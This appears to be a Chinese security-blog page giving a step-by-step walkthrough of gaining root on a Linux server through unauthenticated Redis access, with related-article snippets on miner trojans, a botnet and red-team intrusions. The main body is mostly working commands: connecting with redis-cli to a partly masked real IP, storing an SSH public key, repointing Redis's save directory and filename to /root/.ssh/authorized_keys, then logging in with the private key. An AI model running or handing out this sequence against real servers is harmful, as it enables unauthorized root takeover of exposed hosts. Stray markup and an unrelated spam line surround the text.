<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    redis未授權訪問配合ssh免密登錄getshell

    VSole2023-05-19 09:17:12

    2在一次滲透測試中拿到一個ip地址52.80.249.xx,nmap端口掃描出22,6379,80端口,目標機是linux系統的一臺服務器,6379為redis的默認端口,嘗試對其進行利用。使用kali作為攻擊機.

    一、環境準備

    1.1、在攻擊機上面下載redis

    wget http://download.redis.io/releases/redis-2.8.17.tar.gz

    1.2解壓文件,執行文件

    解壓文件:tar xzf redis-2.8.17.tar.gz

    進入redis目錄:cd redis-2.8.17

    安裝:make

    1.3、進入src目錄,將redis-server和redis-cli拷貝到/usr/bin目錄下(這樣以后啟動redis就不用進入安裝目錄了)

    cd src

    cp redis-server /usr/bin

    cp redis-cli /usr/bin

    1.4、、返回目錄redis-2.8.17,將redis.conf拷貝到/etc/目錄下

    cd ../

    cp redis.conf /etc/

    1.5、使用/etc/目錄下的reids.conf文件中的配置啟動redis服務:

    redis-server /etc/redis.conf

    1.6、然后ctrl+c退出,再次進入src目錄然后連接目標靶機的redis服務

    ctrl+c

    cd src

    redis-cli –h 52.80.249.xx

    出現52.80.249.xx:6379>就代表連接成功,并且沒有輸入密碼

    二、漏洞利用

    2.1、這里附上一個這里沒法利用的一種 攻擊方式截圖(沒有測試僅供參考)

    2.2、我們這里是不知道路徑的,根據前期信息收集知道還有ssh服務的22端口是開放的,可以利用“公私鑰”認證獲取root權限

    使用ssh生成公鑰和私鑰文件

    ssh-keygen -t rsa

    2.3、進入.ssh文件下,將上面生成的公鑰保存到1.txt里面

    cd /root/.ssh

    (echo -e "";cat id_rsa.pub; echo -e "") > 1.txt

    2.4、將生成的公鑰文件通過redis上傳到目標服務器

    cat 1.txt | redis-cli -h 52.80.249.xx -x set crack

    2.5、遠程連接redis服務

    redis-cli -h 52.80.249.xx

    2.6、獲得redis備份的路徑

    config get dir

    2.7、更改redis備份路徑為ssh公鑰存放目錄(一般默認為/root/.ssh):

    2.8、設置上傳公鑰的備份文件名字為authorized_keys:

    config set dbfilename authorized_keys

    2.9、檢查是否更改成功(查看有沒有authorized_keys文件),沒有問題就保存然后退出,至此成功寫入ssh公鑰到靶機

    config get dbfilename

    2.10、攻擊機直接ssh連接目標服務器

    ssh -i id_rsa root@52.80.249.xx

    sshredis
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    Scanners-Box 指引#簡介#Scanners-Box是一個集合github平臺上的安全行業從業人員自研開源掃描器的倉庫,包括子域名枚舉、數據庫漏洞掃描、弱口令或信息泄漏掃描、端口掃描、指紋識別以及其他大型掃描器或模塊化掃描器;該倉庫只收錄各位網友自己編寫的一般性開源掃描器,類似nmap、w3af、brakeman等知名掃描工具不收錄。
    └─50-After-systemd-logind\x2eservice.conf, 50-After-systemd-user-sessions\x2eservice.conf, 50-Description.conf, 50-SendSIGHUP.conf, 50-Slice.conf, 50-TasksMax.con. Active: active since 一 2021-07-12 10:05:01 CST; 4h 52min ago. 真不巧,看起來不是注冊到 systemd 的,那么是誰拉起來的呢?啊,是 crontab非常不巧,我當時一心想找是哪個 service,沒注意到 crontab 的存在,還以為上次的那個挖礦木馬換了個 service 的名字,還去這個路徑找了好久,找了半天也沒有看到惡意的 service 啊突然想到我還沒看 crontab于是打開crontab發現了一條指令他靜靜的呆在那里像是在嘲笑我太菜了,這個套路都沒注意到 :P于是,注釋掉這行,然后對著剛剛 systemd 輸出的三個進程一頓 kill ├─2075 tOAK5Ejl
    └─50-After-systemd-logind\x2eservice.conf, 50-After-systemd-user-sessions\x2eservice.conf, 50-Description.conf, 50-SendSIGHUP.conf, 50-Slice.conf, 50-TasksMax.con. Active: active since 一 2021-07-12 10:05:01 CST; 4h 52min ago. 真不巧,看起來不是注冊到 systemd 的,那么是誰拉起來的呢?啊,是 crontab非常不巧,我當時一心想找是哪個 service,沒注意到 crontab 的存在,還以為上次的那個挖礦木馬換了個 service 的名字,還去這個路徑找了好久,找了半天也沒有看到惡意的 service 啊突然想到我還沒看 crontab于是打開crontab發現了一條指令他靜靜的呆在那里像是在嘲笑我太菜了,這個套路都沒注意到 :P于是,注釋掉這行,然后對著剛剛 systemd 輸出的三個進程一頓 kill├─2075 tOAK5Ejl
    實戰 | 挖礦木馬排查
    2023-02-22 10:05:36
    └─50-After-systemd-logind\x2eservice.conf, 50-After-systemd-user-sessions\x2eservice.conf, 50-Description.conf, 50-SendSIGHUP.conf, 50-Slice.conf, 50-TasksMax.con. Active: active since 一 2021-07-12 10:05:01 CST; 4h 52min ago. 真不巧,看起來不是注冊到 systemd 的,那么是誰拉起來的呢?啊,是 crontab非常不巧,我當時一心想找是哪個 service,沒注意到 crontab 的存在,還以為上次的那個挖礦木馬換了個 service 的名字,還去這個路徑找了好久,找了半天也沒有看到惡意的 service 啊突然想到我還沒看 crontab于是打開crontab發現了一條指令他靜靜的呆在那里像是在嘲笑我太菜了,這個套路都沒注意到 :P于是,注釋掉這行,然后對著剛剛 systemd 輸出的三個進程一頓 kill├─2075 tOAK5Ejl
    網上安全滲透測試工具整理全集,部分鏈接可能失效,但可以搜索到
    Web Hacking 101 中文版:https://wizardforcel.gitbooks.io/web-hacking-101/content/ 淺入淺出Android安全 中文版:https://wizardforcel.gitbooks.io/asani/content/ Android 滲透測試學習手冊 中文
    漏洞及滲透練習平臺 數據庫注入練習平臺 花式掃描器 信息搜集工具 WEB工具 windows域滲透工具 漏洞利用及攻擊框架 漏洞POC&EXP 中間人攻擊及釣魚 密碼pj 二進制及代碼分析工具 EXP編寫框架及工具 隱寫相關工具 各類安全資料 各類CTF資源 各類編程資源 Python
    2020年9月 ,AWAKE Security的Patrick Olsen調查并報告了僅攜帶XMR Miner有效載荷的僵尸網絡的早期版本。僵尸網絡目前正在使用Weblogic漏洞進行傳播。殺死正在運行的進程,潛在地爭奪挖掘工具并消除EDR。shellscript xms通過curl從bash傳遞到bash,以防萬一失敗,使用wget對其進行提取,執行和刪除,以防止分析。使用base64編碼命令來獲取并執行python腳本,以避免檢測和分析。第一組下載并運行Miner二進制文件和隨附的shell腳本,維護持久性并下載并運行第二組python腳本。
    成功getshell后通過冰蝎上傳了一個哥斯拉shell接下來就是socks5代理了,上傳一個frp后發現服務端關了,事發突然并沒有做什么權限維持,到手的shell飛了經過分析和思考,造成這種情況的原因是直接拿了編譯好的frp沒做免殺,也許內網有全流量,設備報警提醒了,管理員發現異常后直接關機了。
    這是本系列第三篇文章,依舊是某省HVV紅隊的經歷。 過程中只用到很簡單的方法,所以加了個標題“有手就行”。 這家企業在內網犯了幾乎所有能犯的錯誤,打起來也比較順利,只不過當時被管理員發現了,爭分奪秒的過程也比較有趣哈哈。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类